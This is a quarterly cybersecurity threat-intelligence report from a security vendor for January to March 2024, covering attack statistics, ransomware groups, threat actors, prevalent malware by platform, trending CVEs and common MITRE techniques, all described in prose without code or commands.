Global Threat Intelligence Report

June 2024 Edition

Reporting Period: January 1 – March 31, 2024

Actionable Intelligence That Matters

This BlackBerry report provides a comprehensive review of the global threat landscape for the period covering January through March 2024. Report highlights include:

We observed over 630,000 malicious hashes, a per-minute increase of over 40 percent over the previous reporting period.

Read more in the Total Attacks This Period section.

60 percent of all attacks were on critical infrastructure. Of those, 40 percent targeted the financial sector.

Find the details in the Critical Infrastructure section.

56 percent of CVEs were rated 7.0 or higher (with 10 being the most severe). CVEs have been rapidly weaponized in all forms of malware — especially ransomware and infostealers.

Learn more in the Common Vulnerabilities and Exposures section.

New Ransomware Section: We’ve included a new section on the top ransomware groups around the world and the most active ransomware this reporting period.

Learn more in the Who’s Who in Ransomware section.

The BlackBerry® Global Threat Intelligence Reports are published every three months. These frequent updates enable CISOs and other key decision makers to stay informed about the most recent cybersecurity threats and challenges in their industries and geographic locations.

The report is the culmination of the research, analysis, and conclusions of our Cyber Threat Intelligence (CTI) team, our Incident Response (IR) team, and security specialists in our CylanceMDR division. Continue scrolling to learn more, download the pdf, or read the executive brief.

Total Attacks This Period

From January to March 2024, BlackBerry cybersecurity solutions stopped over 3,100,000 cyberattacks: this equates to over 37,000 cyberattacks stopped per day. Additionally, we observed an average of 7,500 unique malware samples per day targeting our customer base.
Figure 1: Unique malware hashes per minute encountered. (*The Sept 2023 – Dec 2023 period covered 120 days.)

As you will notice in this report, total attacks do not necessarily correlate with the number of unique hashes (new malware). As figures 2 through 6 in the next two sections illustrate, not every attack utilizes unique malware. It depends on the attacker’s motivation, the complexity of the attack, and the goal — e.g., information stealing or financial theft.

BlackBerry cybersecurity solutions stopped over 3,100,000 cyberattacks: this equates to over 37,000 cyberattacks stopped per day.

Attacks By Country

Attacks Stopped

Figure 2 below shows the top five nations where BlackBerry cybersecurity solutions prevented the most cyberattacks. Organizations utilizing BlackBerry solutions in the United States received the most attempted attacks this reporting period. In the Asia-Pacific (APAC) region, Japan, South Korea and Australia also experienced a high level of attacks, earning them spots within our top five. In Latin America (LATAM), customers in Honduras were heavily targeted, earning that country the fifth spot on our list.

 

Unique Malware

This reporting period, BlackBerry observed over a 40 percent per-minute increase in novel hashes (unique malware), compared to the September through December 2023 period (Figure 1). Figure 2 shows the five countries where BlackBerry cybersecurity solutions recorded the highest number of unique malware hashes, with the United States receiving the greatest number. South Korea, Japan, and Australia in the Asia-Pacific region retained their rankings from the last three-month period, while Brazil joins the list as a new entry.

Figure 2: Attacks stopped and unique malware encountered, ranked by country.
Again, as you compare figures 3a and 3b, you will see that total attacks stopped does not necessarily correlate with the number of unique hashes recorded. Unique, custom tools and tactics might be developed by a highly resourced threat actor that wants to attack a specific, high-value target like a CFO of a particular company. Deepfakes are increasingly used to target specific victims, such as using a deepfake voice recording of a CEO to convince that company’s finance manager to transfer money.
Figure 3a: Attacks stopped, ranked for top five countries impacted this reporting period, versus the previous report.
Figure 3b: Unique hashes, ranked for top countries impacted this reporting period, versus the previous report.

As we'll see in the next sections, other attackers may want to damage physical infrastructure, such as a public utility, by exploiting a vulnerability in the control systems or by infecting a device on the network

Attacks By Industry

As in our previous report, we have consolidated several key industry sectors under two umbrella sections: Critical Infrastructure and Commercial Enterprise.

Critical infrastructure, as defined by the Cybersecurity and Infrastructure Security Agency (CISA), encompasses 16 sectors including healthcare, government, energy, agriculture, finance and defense.

The increasing digitization of these sectors means their assets are more vulnerable to cybercriminals. Threat actors actively exploit critical systems via vulnerabilities such as system misconfigurations and social engineering campaigns against employees.

Commercial enterprises include manufacturing, capital goods, commercial and professional services, and retail. Businesses are always tempting targets for cyberattacks, and the increased use of connected devices and cloud computing has made it easier to breach their systems. Attackers have also become more sophisticated, often using social engineering to obtain account credentials and distribute malware.

Figure 4: Industry-specific attacks stopped versus unique malware.
Cyber Story Highlight: International Banks

Cyber Story Highlight: International Banks

Mexican Banks and Cryptocurrency Platforms Targeted with AllaKore RAT

In January, BlackBerry cyberthreat analysts uncovered a long-running, financially motivated campaign targeting Mexican banks and cryptocurrency trading platforms with the AllaKore RAT, a modified open-source remote access tool. The threat actors used lures mimicking the Mexican Social Security Institute (IMSS) and legitimate documents to distract users during the installation process, allowing them to steal banking credentials and authentication information. This campaign has been ongoing since 2021, focusing on large Mexican companies with revenues exceeding $100 million. BlackBerry's findings suggest that the threat actor is likely based in Latin America, given the use of Mexico Starlink IPs and Spanish-language instructions in the RAT payload. Read the full article on our blog to learn more.

Read Full Story

Critical Infrastructure Threats

Based on our internal telemetry, of those cyberattacks that BlackBerry cybersecurity solutions encountered that were industry-specific, 60 percent were targeted against critical infrastructure. Additionally, 32 percent of unique malware hashes targeted critical infrastructure tenants.

CylanceENDPOINT and other BlackBerry cybersecurity solutions stopped over 1.1 million attacks against critical industry sectors, which include finance, healthcare, government and utilities. Almost half of these 1.1 million attacks were in the finance sector. Additionally, government and public sector organizations experienced the greatest diversity of attacks, with over 36 percent of unique hashes targeting this sector.

Figure 5: Breakdown of attacks stopped and unique malware targeting critical infrastructure.


BlackBerry telemetry recorded several prevalent malware families targeting critical infrastructure around the globe. For instance, the notorious infostealer LummaStealer was observed specifically targeting the food and agriculture industries in Latin America and the energy sector in the APAC region. Notable threats observed during this reporting period included:

  • 8Base ransomware: Ransomware operation | Healthcare sector
  • Amadey (Amadey Bot): Multifunctional botnet | Government facilities
  • Buhti: Ransomware operation | Commercial real estate
  • LummaStealer (LummaC2): C-based infostealer | Food and agriculture sector (LATAM) and energy sector (APAC)
  • PrivateLoader: Downloader family | Energy sector
  • Remcos (RemcosRAT): Commercial-grade remote access tool (RAT) | Food and agriculture sector
  • Vidar (VidarStealer): Commodity infostealer | Various sectors:
    • The energy sector in APAC countries
    • The IT sector in LATAM countries
    • The financial services sector in North America
    • The government facilities sector in Europe, the Middle East and Africa (EMEA)

Details on these threats to critical infrastructure are available in the Appendix.

Figure 6: Prevalent critical infrastructure threats by region.


External Threats Faced by Critical Infrastructure

External threats are cyberattacks recorded outside of BlackBerry’s internal telemetry. During this last reporting period, the broader global threat landscape saw a number of notable attacks against critical infrastructure.

Ramifications continue from the late 2023 breach at the U.S.-based Idaho National Laboratory (INL), a research facility for the U.S. Department of Energy (DOE). Attackers breached the laboratory's cloud-based HR management platform Oracle HCM and siphoned the personal data of over 45,000 people. The hacktivist group SiegedSec claimed responsibility for the attack in the weeks following and posted a portion of the stolen data on an online leak forum. Figure 7 provides a timeline of notable threats against critical infrastructure that occurred during this reporting period.

Figure 7: Notable external attacks against critical infrastructure.
Cyber Story Highlight: Infrastructure, VPNs, and Zero Trust

Cyber Story Highlight: Infrastructure, VPNs, and Zero Trust

Emergency Directive Reveals It May Be Time to Replace VPNs

The core functionality of virtual private networks (VPNs) has remained largely unchanged since their inception in 1996, but recent high-profile security breaches and government directives suggest it may be time to reconsider their use.

A key issue is VPNs' "trust but verify" model, which inherently grants trust to users within the network perimeter, making them vulnerable to cyberattacks. Highlighting this risk, the Cybersecurity and Infrastructure Security Agency (CISA) recently issued emergency directives addressing critical VPN vulnerabilities, urging rapid disconnection of at-risk products. Read the full story on our blog.

Read Full Story

Commercial Enterprise Threats

Just as industries are impacted by cybersecurity threats, individual companies also battle cyberattacks, especially as they tend to rely more on digital infrastructure for finance, communications, sales, procurement and other business operations. Everything from start-ups to multinational conglomerates are susceptible to cyberthreats, particularly ransomware.

Throughout the last reporting period, BlackBerry cybersecurity solutions blocked 700,000 attacks targeting industries within the commercial enterprise sector.

Based upon our internal telemetry, compared to the previous reporting period, commercial enterprises saw:

  • a two percent increase in the number of attacks they faced.
  • a 10 percent jump in unique hashes encountered.
Figure 8: Attacks stopped and unique malware in the commercial enterprise space.


Commercial enterprises face threats from infostealers sold via malware as a service (MaaS) operations. Often, these threats deploy additional malware onto a victim’s device. They continue to evolve in a cyber arms race to circumvent security products and traditional antivirus (AV) software. The prevalent malware noted in BlackBerry telemetry includes:

  • RedLine (RedLine Stealer): Infostealer
  • SmokeLoader: Commonly utilized and versatile malware
  • PrivateLoader: Malware facilitator
  • RaccoonStealer: MaaS infostealer
  • LummaStealer (LummaC2): Malware infostealer

Details on these threats to commercial enterprises are available in the Appendix.

Figure 9: Prevalent commercial enterprise threats by region.


External Threats Faced by Commercial Enterprise

Ransomware is a prevalent scourge against organizations of all sizes and business orientations. Recent examples of ransomware attacks include:

  • VF Corporation — a U.S. manufacturer of well-known sportswear brands such as Timberland, The North Face, and Vans — was the victim of a ransomware attack by the ALPHV ransomware gang in December 2023. The attackers stole the data of over 35 million customers, causing delays in order fulfilment and other disruptions during the all-important holiday season.
  • Coop Värmland, a Swedish supermarket chain, had its busy holiday period disrupted by a ransomware attack perpetrated by the Cactus ransomware gang.
  • A well-known German manufacturer, ThyssenKrupp, suffered a breach in its automotive subdivision in February 2024. The company later said the attack was a failed ransomware attack.
  • In March, the Stormous ransomware group attacked the Belgian Duvel Moortgat Brewery, a producer of over 20 brands of beer, and stole 88 GB of data.

Who’s Who in Ransomware

As the above events highlight, ransomware has been a prevalent threat across the BlackBerry Global Threat Intelligence Report. For this report, we’ve introduced a section specifically about ransomware groups active in this reporting period.

Ransomware is a universal tool adopted by cyber-criminals and organized syndicates alike, targeting victims in all industries around the globe. Most of these groups are financially motivated; they quickly adapt new tactics and techniques to evade traditional cybersecurity defenses and will rapidly exploit any new security vulnerabilities.

Ransomware is increasingly targeting healthcare organizations, a concerning trend. Healthcare is a profitable sector for ransomware groups due to the increasing digitization of healthcare records and the severe consequences that can occur if these services are disrupted. With notable attacks happening globally during this reporting period, these aggressive syndicates can endanger lives and restrict or cut off healthcare workers’ access to patients' crucial personal identifiable information (PII) data. 

Attacks on healthcare can have serious knock-on effects, crippling hospitals, clinics, pharmacies and drug dispensaries; preventing patients from obtaining vital medications; causing ambulances to be re-routed; and disrupting the scheduling of medical procedures. Secondary impacts include data leakage and sensitive patient PII being sold on the dark web. For this reason, we predict healthcare will continue to be heavily targeted both publicly and privately throughout 2024.

Key Ransomware Players This Reporting Period

Following are notable ransomware threat groups from around the globe who were active this reporting period:

Figure 10: Notable ransomware groups/families active January to March 2024.


Hunters International
Hunters International, a ransomware as a service (RaaS) crime syndicate that’s been in operation since late 2023, rose to prominence in early 2024. The group is possibly a spin-off of the Hive ransomware group, which was shuttered by law enforcement in early 2023. This group employs a double extortion scheme that involves first encrypting the victim’s data for ransom, then demanding more money by threatening to publicly post the stolen data. Hunters International is currently active around the globe.

8Base
Initially observed in 2022, the 8Base ransomware group rose to prominence in late 2023. This prolific group uses a variety of tactics, techniques and procedures (TTPs) and can be highly opportunistic. The group is often quick to exploit newly disclosed vulnerabilities and leverages various ransomware, including Phobos

LockBit
LockBit, a Russia-based ransomware group, specializes in providing RaaS through its eponymous malware. Discovered in 2020, LockBit ransomware has become one of the most aggressive ransomware groups. Aspects include:

  • Custom tooling to exfiltrate victim data prior to encryption and host it via a leak site on the dark web.
  • Largely targets victims in North American and, secondarily, in LATAM.
  • Employs a double extortion strategy.

In February 2024, Operation Cronos, an international law enforcement effort, disrupted LockBit’s operations. However, LockBit appears to have since bounced back, and remains a major player in the ransomware space.

Play
Observed initially in 2022, Play is a multi-extortion ransomware group that hosts stolen data on TOR-based sites that enable anonymous communication, threatening that the data will be leaked if the ransom payment isn’t made. Play often targets small and medium businesses (SMBs), mainly in North America, but also in the EMEA region during this reporting period. The group largely leverages off-the-shelf tools like Cobalt Strike, Empire and Mimikatz for discovery and lateral movement TTPs. The group also utilized Grixba, a custom recon and infostealing tool that is used prior to ransomware execution.

BianLian
BianLian is a GoLang-based ransomware that has been in the wild since 2022. The associated group has been active this reporting period, heavily targeting victims based in North America. Like many ransomware groups, BianLian is highly exploitive of recently disclosed vulnerabilities, often targeting smaller companies across a number of industries. It uses various off-the-shelf tools including PingCastle, Advance Port Scanner and SharpShares to gain a foothold on a target system before exfiltrating sensitive data and executing ransomware. This stolen data is then leveraged as an extortion tactic until the ransom is paid.

ALPHV
Often referred to as BlackCat or Noberus, ALPHV is a RaaS operation that has been around since late 2021. The threat group behind ALPHV is highly sophisticated, leveraging the Rust programing language to target Windows, Linux and VMWare-based operating systems. ALPHV tends to target North American victims.

Ransomware groups...quickly adapt new tactics and techniques to evade traditional cybersecurity defenses and will rapidly exploit any new security vulnerabilities.

Cyber Story Highlight: Ransomware and Healthcare

Cyber Story Highlight: Ransomware and Healthcare

12 Days Without Revenue: Ransomware Fallout Continues in Healthcare Sector

In March, the healthcare sector experienced an "unprecedented" ransomware attack that disrupted operations across hospitals and pharmacies, according to the American Hospital Association (AHA). The attack on Change Healthcare, which processes 15 billion health care transactions annually, severely affected patient care services such as clinical decision support and pharmacy operations. This disruption led to a 12-day revenue standstill for impacted medical practices and left patients struggling to access vital prescriptions. With the U.S. Department of Health and Human Services’ Office for Civil Rights now investigating, the latest data reveals a significant rise in cyber-threats, with a 256% increase in large hacking breaches over the past five years. The incident underscores the critical need for enhanced cybersecurity measures in the healthcare industry. For a detailed exploration of this pressing issue, read the full story on our blog.

Read Full Story

Geopolitical Analysis and Comments

Geopolitical conflicts increasingly drive cyberattacks. Digital technologies can be powerful tools for good, but they can also be abused by state and non-state actors. In the first three months of 2024, lawmakers across Europe, North America and the Asia-Pacific region fell victim to targeted spyware campaigns. Threat actors broke into the IT systems of multiple government departments, compromised military systems, and disrupted critical infrastructure around the world.

While the motives driving these intrusions are often complex and opaque, the most significant, recent incidents involved major geopolitical divides such as Russia’s invasion of Ukraine, mounting aggression between Israel and Iran, and ongoing tensions in the South China Sea and the Indo-Pacific region.

In Ukraine, the cyber dimensions of the war continue to grind on. Contrary to international norms governing lawful conduct in cyberspace, attacks launched against Ukraine continue to fail to distinguish between civilian and military infrastructure. In January, Russian agents tapped into residential webcams in Kyiv allegedly to gather information on the city’s air defense systems before launching a missile attack on the city. Per reports, the attackers manipulated camera angles to gather information on nearby critical infrastructure for more precise missile targeting.

Russian cyberthreat actors were also linked to an attack against Ukraine’s largest mobile phone provider, Kyivstar, destroying significant infrastructure and cutting off access to 24 million customers in Ukraine. This attack came just hours before President Biden met with President Zelenskyy in Washington D.C. Lawmakers in the EU also discovered that their phones had been infected with spyware. Many of these lawmakers were members of the European Parliament’s security and defense subcommittee, responsible for making recommendations on EU support to Ukraine. In March, Russian attackers also intercepted conversations between German military officials about potential military support to Ukraine, reinforcing the need to protect communications from increased espionage attempts.

As military activity between Iran and Israel has escalated, so have cyberattacks against Israeli government sites. In retaliation, Israeli threat actors disrupted 70 percent of gas stations across Iran. Meanwhile, the U.S. launched a cyberattack against an Iranian military spy ship in the Red Sea that was sharing intelligence with Houthi rebels.

In the Indo-Pacific region, cyberattacks and espionage campaigns attributed to Chinese-backed groups continued to mount. The U.S. Department of Homeland Security’s Cyber Safety Review Board released a major report about the Microsoft Online Exchange Incident from the summer of 2023 and documented in detail how Chinese-backed attackers stole source code from Microsoft. The threat group Storm-0558 compromised employees and officials in the U.S. Department of State, the U.S. Department of Commerce, the U.S. House of Representatives, and several government departments in the UK. According to the report, the threat actor managed to download approximately 60,000 emails from the State Department alone.

This was not an isolated incident. In March 2024, the U.S. Department of Justice and the FBI revealed that Chinese attackers had targeted several UK, EU, U.S. and Canadian members of the Interparliamentary Alliance on China.

As noted earlier, attacks against critical infrastructure have risen, particularly in the financial and healthcare sectors. In the first three months of 2024, a massive data breach of a French health insurance company led to the leak of sensitive personal information. In Canada, the Financial Transactions and Reports Analysis Center (FINTRAC) shut down its systems after a cyber incident. In response, the Canadian government allocated CAN$27 million to enhance FINTRAC’s cyber resiliency and construct data security safeguards.

Governments around the world are investing in stronger cybersecurity in the face of increased cyber espionage and cyberattack attempts. Canada recently announced historic levels of investment in its cyber defenses, and the UK increased its defense spending to 2.5 percent of GDP. Cybersecurity remains one of the top risks for governments and private sector actors alike, and this trend will likely continue so long as geopolitical tensions continue to rise.

Incident Response Observations

Incident response (IR) is an enterprise-level approach to managing cyberattacks and cybersecurity incidents. The goal of incident response is to quickly contain and minimize damage caused by a breach, as well as reducing recovery time and costs. Every organization needs an IR plan and either an in-house or third-party IR service. BlackBerry® Cybersecurity Services — which includes cyber incident response, data breach response, business email compromise response, ransomware response, and digital forensics — provides rapid incident response plans to help mitigate the impact of any cyberattack and ensure that digital recovery follows best practices.
Figure 11: BlackBerry IR engagement breakdown.


Observations of the BlackBerry Incident Response Team

This is a summary of the types of IR engagements the BlackBerry team responded to, as well as security measures organizations can take to prevent such breaches.

  • Network Intrusion: Incidents in which the initial infection vector was a vulnerable, Internet-facing system, such as a web server or a virtual private network (VPN) appliance. In some cases, the breach led to the deployment of ransomware within the target's environment and the exfiltration of data.
    • Prevention: Apply security updates to all Internet-exposed systems in a timely manner. (MITRE – External Remote Services, T1133.)
  • Insider Misconduct: A current and/or former employee accessed company resources without authorization.  
    • Prevention: Implement strong authentication security controls on all systems. Implement formal company employee offboarding procedures. (MITRE – Valid Accounts: Cloud Accounts, T1078.004.)
  • Ransomware: Ten percent of all incidents responded to were ransomware-based.
    • Prevention: Patch Internet-facing services such as email, VPNs, and web servers in a timely fashion. This can prevent a threat actor from accessing and further actioning on objectives, such as deploying ransomware, after gaining access to an enterprise network via a vulnerable device or system. (MITRE – External Remote Services, T1133.)
    • Prevention: Ensure the organization has two copies of all critical data stored in two different media formats from the original data source, with at least one copy off-site.

Detecting, containing and recovering from a cybersecurity incident requires rapid detection and response to limit damage. It is imperative that organizations have a well-documented incident response plan in place, along with trained personnel and resources ready to take immediate action at the first signs of a potential breach. This ensures that security teams can detect issues as early as possible, quickly contain and eradicate threats, and mitigate business and brand reputation impacts, monetary losses, and legal risks to the organization.

Threat Actors and Tooling

Threat Actors

Dozens of threat groups mounted cyberattacks in the first three months of 2024. We have highlighted the most impactful attacks here.

LockBit

LockBit is a cybercriminal group with affiliations to Russia. The group's operators diligently maintain and enhance their eponymous ransomware, overseeing negotiations and orchestrating its deployment once a successful breach happens. Employing double extortion strategies, LockBit ransomware not only encrypts local data to restrict victim access but also exfiltrates sensitive information and threatens to publicly expose it unless a ransom is paid.

In February, the NCA, the FBI, and Europol, through a coordinated global effort named “Operation Cronos,” collaborated with law enforcement agencies across 10 countries to take control of the LockBit group’s infrastructure and leak site, gather information from their servers, make arrests, and impose sanctions.

However, less than one week later, the ransomware group regrouped and resumed its attacks, employing updated encryptors and ransom notes that direct victims to new servers following the law enforcement disruption.

LockBit claimed responsibility for cyberattacks against various networks, including the Capital Health hospital network. In both instances, they threatened to release confidential data unless prompt ransom payments were made.

Rhysida

Rhysida is a relatively new RaaS group that was first observed towards the end of May 2023. Despite its relatively recent emergence, the group quickly established itself as a viable ransomware threat. Its first high-profile attack targeted the Chilean Army, marking the start of a rise in ransomware attacks on Latin American government institutions.
The Rhysida group also attacked yacht retailer MarineMax. The Rhysida group exfiltrated a limited amount of data from their environment, including customer and employee information, including PII which can be used for identity theft. This stolen data is now being offered for sale on the dark web for 15 BTC — approximately U.S. $1,013,556 at the time of writing. Additionally, Rhysida released screenshots purportedly showing MarineMax's financial documents, along with images of employee drivers licenses and passports, on its dark web leak site.

APT29

APT29, also known as Cozy Bear, Midnight Blizzard, or NOBELIUM, is a threat group attributed to Russia’s Foreign Intelligence Service (SVR). APT29 is known for targeting governments, political and research organizations, as well as critical infrastructure.

CISA recently warned that APT29 has expanded its targeting to include additional industries and more local governments. Known to use a wide range of custom malware, the threat group has also recently targeted cloud services using compromised service accounts or stolen authentication tokens.

In this reporting period, APT29 was observed accessing a Microsoft test tenant account following a password spray attack, then creating malicious OAuth applications to access corporate email accounts. Furthermore, they targeted German political parties with WINELOADER, a backdoor first observed in January 2024.

Akira

First seen in early 2023, Akira ransomware has been observed targeting organizations across all industries. By accessing networks with misconfigured or vulnerable VPN services, public facing RDP, spear-phishing, or compromised credentials, they attempt to create domain accounts or find credentials for privilege escalation or lateral movement within networks.

Akira has been known to use tools such as:

  • AdFind for querying Active Directory.
  • Mimikatz and LaZagne for accessing credentials.
  • Ngrok for tunneling into networks behind firewalls or other security measures.
  • AnyDesk for remote access.
  • Advanced IP Scanner for locating devices on a network.

Key Tools Used by Threat Actors

Mimikatz

Mimikatz is recognized for its ability to extract sensitive credentials from the Local Security Authority Subsystem Service (LSASS) process on Windows systems. 
This process serves as the repository for user credentials post-login, making it a prime target for both ethical penetration testers and malicious actors alike. Mimikatz is a popular utility for assessing the robustness of Windows networks. Legitimate penetration testers can use Mimikatz to uncover critical vulnerabilities, while malicious threat actors can use it to escalate privileges or traverse laterally within networks. Threat groups such as LockBit and Phobos exploit its capabilities to execute sophisticated cyberattacks.

Cobalt Strike

Cobalt Strike, an adversary simulation framework, replicates the persistent presence of threat actors within network environments. The tool has two pivotal components: an agent (Beacon) and a server (Team Server). The Team Server, functioning as a long-term C2 server hosted on the Internet, maintains constant communication with Beacon payloads deployed on compromised machines.
While Cobalt Strike is primarily used by penetration testers and red teams to assess the security posture of networks, it has also been exploited by threat actors. The code for Cobalt Strike 4.0 was leaked online in late 2020, leading to its rapid weaponization by a diverse array of malicious adversaries. The dual nature of Cobalt Strike highlights the importance of vigilance and robust cybersecurity measures to mitigate the risks associated with its misuse, safeguarding networks from potential exploitation.

Ngrok

Ngrok is a platform for exposing internal systems to the Internet. It provides tunneled access to a network or device behind firewalls. After establishing an Internet-visible endpoint, traffic going to that endpoint is then sent through Transport Layer Security (TLS) tunnels to the corresponding Ngrok agent in the internal network. This allows for activities such as rapid ad-hoc testing of systems or remote administration.
However, this functionality also makes it an attractive tool for attackers, providing a secure channel for command-and-control (C2) and exfiltration. In the past it has been used by threat groups such as ALPHV, Lazarus and Daixin Team.

ConnectWise

ConnectWise ScreenConnect is a remote desktop administration tool widely used by technical support, managed services providers (MSPs), and other professionals to authenticate machines. 
Threat actors can abuse ScreenConnect to infiltrate high-value endpoints and exploit privileges. ConnectWise has recently addressed two major security issues (CVE-2024-1709 and CVE-2024-1708) that could potentially enable anonymous attackers to exploit an authentication bypass flaw and create admin accounts on publicly exposed instances.  

Prevalent Threats by Platform: Windows

Remcos

Remote Access Trojan

Remcos, short for Remote Control and Surveillance, is an application used to remotely access a victim’s device.

Agent Tesla

Infostealer

Agent Tesla is a .NET based Trojan that is often seen sold as a MaaS and is used primarily for credential harvesting.

RedLine

Infostealer

RedLine malware utilizes a wide range of applications and services to illicitly exfiltrate victims’ data, such as credit card information, passwords, and cookies.

RisePro

Infostealer

While updated variations of RisePro were observed in our last report, the infostealer was seen in a new campaign being falsely distributed as “cracked software” on GitHub repositories during this reporting period.

SmokeLoader

Backdoor

SmokeLoader is a modular malware used to download other payloads and steal information. It was originally observed in 2011 but remains an active threat to this day.

Prometei

Cryptocurrency Miner/Botnet

Prometei is a multi-stage cross-platform cryptocurrency botnet primarily targeting Monero coins. It can adjust its payload to target either Linux or Windows platforms. Prometei has been seen used alongside Mimikatz to spread to as many endpoints as possible.

Buhti

Ransomware

Buhti is a ransomware operation that utilizes existing variations of other malware such as LockBit or Babuk to target Linux and Windows systems.

Prevalent Threats by Platform: Linux

XMRig

Cryptocurrency Miner

XMRig continues to be prevalent during this reporting period. The miner targets Monero while enabling the threat actor to use a victim’s system to mine cryptocurrency without their knowledge.

NoaBot/Mirai

Distributed Denial of Service (DDoS)

NoaBot is a slightly more sophisticated Mirai variant. It boasts improved obfuscation techniques compared to Mirai and uses SSH to spread as opposed to Telnet. It is also compiled with uClibc instead of GCC, making detection difficult.NoaBot/Mirai

XorDDoS

DDoS

Frequently observed in our telemetry, XorDDoS is a Trojan malware that targets Internet-facing devices running Linux and coordinates infected botnets via C2 instructions. It gets its name from using XOR encryption to control access to execution and communication data.

AcidPour

Wiper

Although not present in our own telemetry, a new version of the data wiper AcidPour has been seen in the wild. The latest version of the malware, which is utilized to wipe files on routers and modems, is designed to specifically target Linux x86 devices.

Prevalent Threats by Platform: MacOS

RustDoor

Backdoor

RustDoor is a Rust-based backdoor malware which is primarily distributed by being disguised as updates for legitimate programs. The malware spreads as FAT binaries containing Mach-o files.

Atomic Stealer

Infostealer

Atomic Stealer (AMOS) remains prevalent with a new version spotted in the wild. The latest version of the stealer drops a Python script to aid in remaining undetected. AMOS targets passwords, browser cookies, autofill data, crypto wallets and Mac keychain data.

Empire Transfer

Infostealer

An infostealer discovered by Moonlock Lab in February 2024. It can “self-destruct” when it detects that it is running in a virtual environment. This helps the malware remain undetected and makes analysis more difficult for defenders. Empire Transfer targets passwords, browser cookies and crypto wallets, and utilizes similar tactics to Atomic Stealer (AMOS).

Prevalent Threats by Platform: Android

SpyNote

Infostealer/RAT

SpyNote utilizes the Android Accessibility Service to capture user data and send captured data to a C2 server.

Anatsa/Teabot

Infostealer

Primarily distributed through the Google Play store as Trojan applications. After initial infection from the Trojan application, Anatsa downloads additional malicious files to the victim’s device from a C2 server.

Vultur

Infostealer/RAT

First discovered in 2021, Vultur has been distributed through Trojan applications and “smishing” (SMS phishing) social engineering techniques. In addition to data exfiltration, a threat actor can also make changes to the file system, modify execution permissions, and control the infected device using Android Accessibility Services.

Coper/Octo

Infostealer/RAT

A variant of the Exobot family. Packaged as a MaaS product, its capabilities include keylogging, SMS monitoring, screen control, remote access and C2 operation.

Common Vulnerabilities and Exposures

Common Vulnerabilities and Exposures (CVEs) provide a framework for identifying, standardizing and publicizing known security vulnerabilities and exposures. As mentioned earlier, cyber criminals are increasingly using CVEs to breach systems and steal data. This reporting period, new vulnerabilities found within Ivanti, ConnectWise, Fortra and Jenkins products offered bad actors new ways to target victims. In addition, the last few months have demonstrated the risks of supply chain attacks that could be present in open-source projects with the XZ backdoor, which had been intentionally planted in XZ Utils, a data compression utility available on almost all installations of Linux.

Almost 8,900 new CVEs were reported by the National Institute of Standards and Technology (NIST) from January through March. The base score is composed of carefully calculated metrics which can be used to calculate a severity score of zero to 10. The dominant CVE base score was a “7,” which accounted for 26 percent of the total scores. This is an increase of three percent for this CVE score compared to the last reporting period. March holds the record so far this year for the most newly discovered CVEs, with close to 3,350 new CVEs. The Trending CVEs table references specific vulnerabilities listed in the NIST National Vulnerability Database.

Figure 12: Breakdown of CVE severity.

Trending CVEs

XZ Utils Backdoor

CVE-2024-3094 (10 Critical)
Unauthorized Access

This malicious code was embedded in XZ Utils version 5.6.0 and 5.6.1. The backdoor manipulated sshd, which would grant unauthenticated attackers unauthorized access to affected Linux distributions.
 

Ivanti Zero-Day Vulnerabilities

CVE-2024-21887 (9.1 Critical); CVE-2023-46805 (8.2 High); CVE-2024-21888 (8.8 High); CVE-2024-21893 (8.2 High)
Arbitrary Code Execution

Early this year, authentication bypass and command injection vulnerabilities were found within Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) products. If both were used in conjunction by a threat actor, this would allow them to craft malicious requests and to execute arbitrary commands on the system.

In January, Ivanti also warned about two more vulnerabilities affecting the products, CVE-2024-21888 (a privilege escalation vulnerability) and CVE-2024-21893 (a server-side request forgery vulnerability). Nation-state actors have exploited these zero-day vulnerabilities to deploy custom malware strains.
 

Windows SmartScreen Bypass

CVE-2024-21412 (8.1 High)
Security Bypass

This is an Internet shortcut file security feature bypass that affects Microsoft Windows Internet shortcut files. It requires user interaction to bypass the security checks. Upon initial interaction, it causes a series of executions ultimately leading the victim to a malicious script. This zero-day vulnerability was used to deploy the DarkMe RAT by a threat group.

Windows Kernel Elevation Vulnerability

CVE-2024-21338 (7.8 High)
Elevation of Privilege

Exploiting this vulnerability allows the attacker to gain system privileges. The Lazarus Group (a North Korean threat group) exploited this zero-day vulnerability found within Windows AppLocker driver (appid.sys) to gain kernel-level access.

Fortra’s GoAnywhere MFT Exploit

CVE-2024-0204 (9.8 Critical)
Authentication Bypass

In January, Fortra published a security advisory sharing the critical bypass affecting a GoAnywhere MFT product. This vulnerability was found within Fortra's GoAnywhere MFT prior to 7.4.1. Exploitation allows an unauthorized user to create an admin user via the administration portal.

Jenkins Arbitrary File Read Vulnerability

CVE-2024-23897 (9.7 Critical)
Remote Code Execution

Prior versions of Jenkins — up to 2.441 and earlier, LTS 2.426.2 — contain a vulnerability found on the Jenkins controller file system via the built-in command line interface. It is found within args4j library, which has a feature that replaces an “@” character followed by a file path in an argument with the file’s contents.34 This, in turn, allows an attacker to read arbitrary files on the file system, and could potentially lead to remote code execution.

ConnectWise ScreenConnect 23.9.7 Vulnerability

CVE-2024-1709 (10 Critical); CVE-2024-1708 (8.4 High)
Remote Code Execution

This vulnerability affects the ConnectWise ScreenConnect 23.9.7 product. Attackers have been seen to leverage both of these vulnerabilities in the wild. Both work in conjunction with each other where CVE-2024-1709 (a critical authentication bypass vulnerability) allows the attacker to create administrative accounts and exploit CVE-2024-1708 (a path traversal vulnerability), allowing unauthorized access to the victim’s files and directories.

Common MITRE Techniques

Understanding threat groups’ high-level techniques can aid in deciding which detection techniques should be prioritized. BlackBerry observed the following Top 20 techniques being used by threat actors in this reporting period.

An upward arrow in the last column indicates that usage of the technique has increased since our last report; a downward arrow indicates that usage has decreased, and an equals (=) symbol means that the technique remains in the same position as in our last report.

Technique Name Technique ID Tactic Name Last Report Change
Process Injection
T1055
Privilege Escalation, Defense Evasion
1
=
System Information Discovery
T1082
Discovery
3
DLL Side-Loading
T1574.002
Persistence, Privilege Escalation, Defense Evasion
4
Input Capture
T1056
Credential Access, Collection
2
Security Software Discovery
T1518.001
Discovery
NA
Masquerading
T1036
Defense Evasion
10
File and Directory Discovery
T1083
Discovery
13
Process Discovery
T1057
Discovery
19
Application Layer Protocol
T1071
Command-and-control
6
Registry Run Keys/Startup Folder
T1547.001
Persistence, Privilege Escalation
9
Non-Application Layer Protocol
T1095
Command-and-control
5
Remote System Discovery
T1018
Discovery
15
Application Window Discovery
T1010
Discovery
NA
Software Packing
T1027.002
Defense Evasion
NA
Scheduled Task/Job
T1053
Execution, Persistence, Privilege Escalation
8
Windows Service
T1543.003
